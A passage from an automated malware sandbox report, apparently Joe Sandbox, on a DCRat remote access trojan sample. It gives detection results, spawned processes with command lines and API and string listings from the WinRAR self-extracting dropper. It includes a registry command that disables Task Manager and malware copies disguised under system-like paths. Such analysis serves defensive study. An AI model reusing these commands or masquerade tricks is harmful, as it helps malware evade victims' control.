DCRat, Source: 00000015.00000002.4464133961.0000000003444000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.000000000371D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.000000000374F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000033A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000037F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.000000000324D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.000000000352E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.4464133961.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	11:01:56
Start date:	03/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff6d4b00000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:01:56
Start date:	03/01/2025
Path:	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe"
Imagebase:	0x950000
File size:	847'360 bytes
MD5 hash:	5073237558733D40EB37F2616E755ACF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2148349997.0000000002CED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.2148349997.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:01:56
Start date:	03/01/2025
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Imagebase:	0xe80000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:02:01
Start date:	03/01/2025
Path:	C:\Users\Default\Pictures\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\Default\Pictures\RuntimeBroker.exe"
Imagebase:	0xc0000
File size:	847'360 bytes
MD5 hash:	5073237558733D40EB37F2616E755ACF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.2194108446.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.2194108446.00000000024B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1515
Total number of Limit Nodes:	30

Executed Functions

Function 0087D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008700CF: GetModuleHandleW.KERNEL32(kernel32), ref: 008700E4
Part of subcall function 008700CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008700F6
Part of subcall function 008700CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00870127

Part of subcall function 00879DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00879DAC

Part of subcall function 0087A335: OleInitialize.OLE32(00000000), ref: 0087A34E
Part of subcall function 0087A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0087A385
Part of subcall function 0087A335: SHGetMalloc.SHELL32(008A8430), ref: 0087A38F

Part of subcall function 008713B3: GetCPInfo.KERNEL32(00000000,?), ref: 008713C4
Part of subcall function 008713B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 008713D8

GetCommandLineW.KERNEL32 ref: 0087D61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0087D643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0087D654
UnmapViewOfFile.KERNEL32(00000000), ref: 0087D68E

Part of subcall function 0087D287: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0087D29D
Part of subcall function 0087D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0087D2D9

CloseHandle.KERNEL32(00000000), ref: 0087D697
GetModuleFileNameW.KERNEL32(00000000,008BDC90,00000800), ref: 0087D6B2
SetEnvironmentVariableW.KERNEL32(sfxname,008BDC90), ref: 0087D6BE
GetLocalTime.KERNEL32(?), ref: 0087D6C9
_swprintf.LIBCMT ref: 0087D708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0087D71A
GetModuleHandleW.KERNEL32(00000000), ref: 0087D721
LoadIconW.USER32(00000000,00000064), ref: 0087D738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0087D789
Sleep.KERNEL32(?), ref: 0087D7B7
DeleteObject.GDI32 ref: 0087D7F0
DeleteObject.GDI32(?), ref: 0087D800
CloseHandle.KERNEL32 ref: 0087D843

Strings

sfxstime, xrefs: 0087D715
winrarsfxmappingfile.tmp, xrefs: 0087D637
STARTDLG, xrefs: 0087D77E
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0087D6F9
C:\Users\user\Desktop, xrefs: 0087D5E9
sfxname, xrefs: 0087D6B9

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-2656992072
Opcode ID: ae00adfc5204868e4cdd0469bfe60dbf156dc1e5936ea2fe26a1c2a7d90e5faa
Instruction ID: aafe8fad22b533e698812d2f8f9fadb16abd220b466a3f9e3375a9b7dbc72455
Opcode Fuzzy Hash: ae00adfc5204868e4cdd0469bfe60dbf156dc1e5936ea2fe26a1c2a7d90e5faa
Instruction Fuzzy Hash: BB61E371900341AFE320ABA5DC49F6A3BB8FF49744F048429F549D22A6EB78D904CB63

Function 00879E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(0087AE4D,PNG,?,?,?,0087AE4D,00000066), ref: 00879E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,0087AE4D,00000066), ref: 00879E46
LoadResource.KERNEL32(00000000,?,?,?,0087AE4D,00000066), ref: 00879E59
LockResource.KERNEL32(00000000,?,?,?,0087AE4D,00000066), ref: 00879E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0087AE4D,00000066), ref: 00879E82
GlobalLock.KERNEL32(00000000), ref: 00879E93
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00879EB7
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00879EFC
GlobalUnlock.KERNEL32(00000000), ref: 00879F1B
GlobalFree.KERNEL32(00000000), ref: 00879F22

Strings

PNG, xrefs: 00879E1F

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
String ID: PNG
API String ID: 3656887471-364855578
Opcode ID: 182775136c5a5c7b0d71949ccd94fa84c959becf8bf1a44b61c76495acd29fd3
Instruction ID: a6b49cff3e884e1ea7256fead4e64493bc75160faa08740c490a64952a3b281f
Opcode Fuzzy Hash: 182775136c5a5c7b0d71949ccd94fa84c959becf8bf1a44b61c76495acd29fd3
Instruction Fuzzy Hash: 4731A471204706AFD711AF65EC48D1BBBADFF85751B08851AF94AD2264EF31DC00CA61

Function 0086A5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0086A4EF,000000FF,?,?), ref: 0086A628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0086A4EF,000000FF,?,?), ref: 0086A65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0086A4EF,000000FF,?,?), ref: 0086A66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,0086A4EF,000000FF,?,?), ref: 0086A692
GetLastError.KERNEL32(?,?,?,?,0086A4EF,000000FF,?,?), ref: 0086A69E

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 2c7b374393ed42358722e8ad818717a0b128bb12523dd98aa7800bb813ad8cc9
Instruction ID: 4a35ad27ce11f7f8a03b0ace8396c4f341990725919cee68b06a4206e2df34e0
Opcode Fuzzy Hash: 2c7b374393ed42358722e8ad818717a0b128bb12523dd98aa7800bb813ad8cc9
Instruction Fuzzy Hash: E8418F72504645AFC324EF68C884ADAF7ECFF58344F054A2AF599E3200D774E9648FA2

Function 0088753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00887513,00000000,0089BAD8,0000000C,0088766A,00000000,00000002,00000000), ref: 0088755E
TerminateProcess.KERNEL32(00000000,?,00887513,00000000,0089BAD8,0000000C,0088766A,00000000,00000002,00000000), ref: 00887565
ExitProcess.KERNEL32 ref: 00887577

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5db435975d6fcc297731756dc06a07a736c02ee45b16054d4111937d4b2b2ff4
Instruction ID: 65a9a3483d35929d3e99cce65d6b7990927e907ec72767a099c21e181ef2c779
Opcode Fuzzy Hash: 5db435975d6fcc297731756dc06a07a736c02ee45b16054d4111937d4b2b2ff4
Instruction Fuzzy Hash: D7E0B635004948ABCF11BF68DD09A497B79FB44745F248425F9068A232CB35EE42CB51

Function 0086857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00868580
_memcmp.LIBVCRUNTIME ref: 00868A08

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: eff30f6881782c1551a0b1b35507cc70cfcb29014d143cc6a61c9378b8f39cee
Instruction ID: 892ccb327ad7e1f7231cc68ec8cdf4d77021a16db533e9d1cb10de2b4d9b5d98
Opcode Fuzzy Hash: eff30f6881782c1551a0b1b35507cc70cfcb29014d143cc6a61c9378b8f39cee
Instruction Fuzzy Hash: 8C823B70904245EEDF25CB64C485BFABBA9FF15300F0942BAE99DDB182DF315A48CB61

Function 0087AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0087AEE5

Part of subcall function 0086130B: GetDlgItem.USER32(00000000,00003021), ref: 0086134F
Part of subcall function 0086130B: SetWindowTextW.USER32(00000000,008935B4), ref: 00861365

Strings

winrarsfxmappingfile.tmp, xrefs: 0087B2BC
<, xrefs: 0087B29A
STARTDLG, xrefs: 0087AF04
__tmp_rar_sfx_access_check_%u, xrefs: 0087B1CB
C:\Users\user\Desktop, xrefs: 0087B2DF
-el -s2 "-d%s" "-sp%s", xrefs: 0087B281
"%s"%s, xrefs: 0087B423
LICENSEDLG, xrefs: 0087B771
@, xrefs: 0087B2A7

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-3472986185
Opcode ID: 77260efa1d97ec151e22eff4b76876aad8dfd386f93a16b9990b946dba8bd85c
Instruction ID: f4eb75860537aee4e3cb7a6aad125b722664a5dfdef19597c5cb77156a4a871e
Opcode Fuzzy Hash: 77260efa1d97ec151e22eff4b76876aad8dfd386f93a16b9990b946dba8bd85c
Instruction Fuzzy Hash: 4042F270944244BFEB25ABA49C8AFBE3B7DFB06744F048155F209E61D6CB748D44CB26

Function 008700CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 008700E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008700F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00870127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008703D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008703F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00870402
ReadFile.KERNEL32(00000000,?,00007FFE,00893BA4,00000000), ref: 00870421
CloseHandle.KERNEL32(00000000), ref: 00870479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0087048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 008704E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00870510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0087054A

Part of subcall function 00870085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008700A0
Part of subcall function 00870085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0086EB86,Crypt32.dll,00000000,0086EC0A,?,?,0086EBEC,?,?,?), ref: 008700C2

_swprintf.LIBCMT ref: 008705BE
_swprintf.LIBCMT ref: 0087060A

Part of subcall function 0086400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0086401D

AllocConsole.KERNEL32 ref: 00870612
GetCurrentProcessId.KERNEL32 ref: 0087061C
AttachConsole.KERNEL32(00000000), ref: 00870623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00870649
WriteConsoleW.KERNEL32(00000000), ref: 00870650
Sleep.KERNEL32(00002710), ref: 0087065B
FreeConsole.KERNEL32 ref: 00870661
ExitProcess.KERNEL32 ref: 00870669

Strings

DXGIDebug.dll, xrefs: 00870169, 008704D3
dwmapi.dll, xrefs: 00870194, 00870581
SetDefaultDllDirectories, xrefs: 00870121
uxtheme.dll, xrefs: 0087058B
kernel32, xrefs: 008700DD
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 008705F8
SetDllDirectoryW, xrefs: 008700F0

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: 902698e74c2e45bdd33a6b1f0ca3631016764ec5c5f4e9b0a99cbcf5a7d7854d
Instruction ID: 7075f535e8d8ed7ea031990cbb7585a41bdc14613760e73f3886af2e3cf761ae
Opcode Fuzzy Hash: 902698e74c2e45bdd33a6b1f0ca3631016764ec5c5f4e9b0a99cbcf5a7d7854d
Instruction Fuzzy Hash: 71D151B1508784ABDB20BF94D849B9FBAE8FB85708F58491DF689D6140DBB0864C8F53

Function 0087BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0087BDFA

Part of subcall function 0087AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0087AAFE

SetWindowTextW.USER32(?,?), ref: 0087C127
_wcsrchr.LIBVCRUNTIME ref: 0087C2B1
GetDlgItem.USER32(?,00000066), ref: 0087C2EC
SetWindowTextW.USER32(00000000,?), ref: 0087C2FC
SendMessageW.USER32(00000000,00000143,00000000,008AA472), ref: 0087C30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0087C335

Strings

<br>, xrefs: 0087C08A
%s.%d.tmp, xrefs: 0087BFF6
Software\Microsoft\Windows\CurrentVersion, xrefs: 0087C1D0
ProgramFilesDir, xrefs: 0087C1FB

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: 97782d88aeb213126944364176abf568a49c1e59b41ddc2a6f00834956f4007d
Instruction ID: d076a20597123e2fb005a933c5f81e166686ed730139cd7c845305d379e8af93
Opcode Fuzzy Hash: 97782d88aeb213126944364176abf568a49c1e59b41ddc2a6f00834956f4007d
Instruction Fuzzy Hash: 5FE16272D00518AADB25EBA4DC45EEF777CFF08711F04806AF609E3155EB74DA848B61

Function 0086D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0086D346
_wcschr.LIBVCRUNTIME ref: 0086D367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0086D328,?), ref: 0086D382
__fprintf_l.LIBCMT ref: 0086D873

Part of subcall function 0087137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0086B652,00000000,?,?,?,0001043E), ref: 00871396

Strings

*messages***, xrefs: 0086D4D3
,, xrefs: 0086D8AE
$%s:, xrefs: 0086D856
@%s:, xrefs: 0086D85D, 0086D869
RTL, xrefs: 0086D838
, xrefs: 0086D67A
*messages***, xrefs: 0086D49A
R, xrefs: 0086D4E5
a, xrefs: 0086D4EF

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-980926923
Opcode ID: 1eb674412012e5dec4c6def7a1e9e369755bdca3ca9b57e3fe2483572fb425f2
Instruction ID: cce0d49d0ad64e3b43160b04860cc4e625e3b2190ab8d5f739bb36bb1cfb75b6
Opcode Fuzzy Hash: 1eb674412012e5dec4c6def7a1e9e369755bdca3ca9b57e3fe2483572fb425f2
Instruction Fuzzy Hash: 4412D171E003199ADF24EFA8DC85BEEB7B5FF04704F154569E606E7281EB709A40CB61

Function 0087CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0087AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0087AC85
Part of subcall function 0087AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0087AC96
Part of subcall function 0087AC74: IsDialogMessageW.USER32(0001043E,?), ref: 0087ACAA
Part of subcall function 0087AC74: TranslateMessage.USER32(?), ref: 0087ACB8
Part of subcall function 0087AC74: DispatchMessageW.USER32(?), ref: 0087ACC2

GetDlgItem.USER32(00000068,008BECB0), ref: 0087CB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0087A632,00000001,?,?,0087AECB,00894F88,008BECB0), ref: 0087CB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0087CBA1
SendMessageW.USER32(00000000,000000C2,00000000,008935B4), ref: 0087CBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0087CBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0087CBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0087CC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0087CC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0087CC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0087CC67
